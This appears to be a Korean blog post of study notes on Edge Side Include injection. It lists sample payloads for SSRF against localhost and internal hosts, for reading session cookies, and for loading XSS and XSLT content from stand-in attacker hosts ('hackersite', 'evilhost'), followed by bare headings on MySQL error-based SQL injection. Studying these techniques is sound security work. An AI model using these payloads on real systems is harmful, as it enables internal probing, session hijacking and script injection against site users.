ESI injection
1. Edge Side Include Injection
html tag와 함께 웹 페이지를 구성 할 수 있는 markup language
https://www.w3.org/TR/esi-lang
http://esi-examples.akamai.com/
Weather for <esi:include src="/weather/name?id=$(QUERY_STRING{city_id})" />
Monday:<esi:include src="/weather/week/monday?id=$(QUERY_STRING{city_i
d})"/>
Tuesday:<esi:include src="/weather/week/tuesday?id=$(QUERY_STRING{city_I
d})" />
Edge Side Includes Injection – SSRF
<esi:include src=http://127.0.0.1/server-status/>
<esi:include src=http://internal_domain/server_base_csrf_page/>
-
Edge Side Includes Injection – Session Hijacking
<esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> <esi:vars>$(HTTP_COOKIE{JSESSIONID})</esi:vars> <esi:vars>$(HTTP_COOKIE{Private_Cookie})</esi:vars>
Edge Side Includes Injection – XSS
<esi:include src=http://hackersite/xss.html/>
Edge Side Includes Injection – XML
<esi:include src="http://evilhost/poc.xml" dca="xslt" stylesheet="http://evilho
st/poc.xsl"/>
error based sql injection
mysql 5.5.5버전
수학적인 연산
1.MySQL Error Based SQL injection Using EXP
실습
2. BIGINT Overflow Error Based SQL Injection in MySQL
실습
'꿀팁!' 카테고리의 다른 글
구직사이트를 크롤링하여 클릭하는 프로그램 (2) | 2020.05.14 |
---|---|
modern C++ 공부했던것 (0) | 2020.02.29 |
스터디6-T-Rex Runner game hack(openCV를 이용한 이미지처리) (0) | 2020.01.22 |
스터디5 (0) | 2020.01.20 |
스터디4 (0) | 2020.01.17 |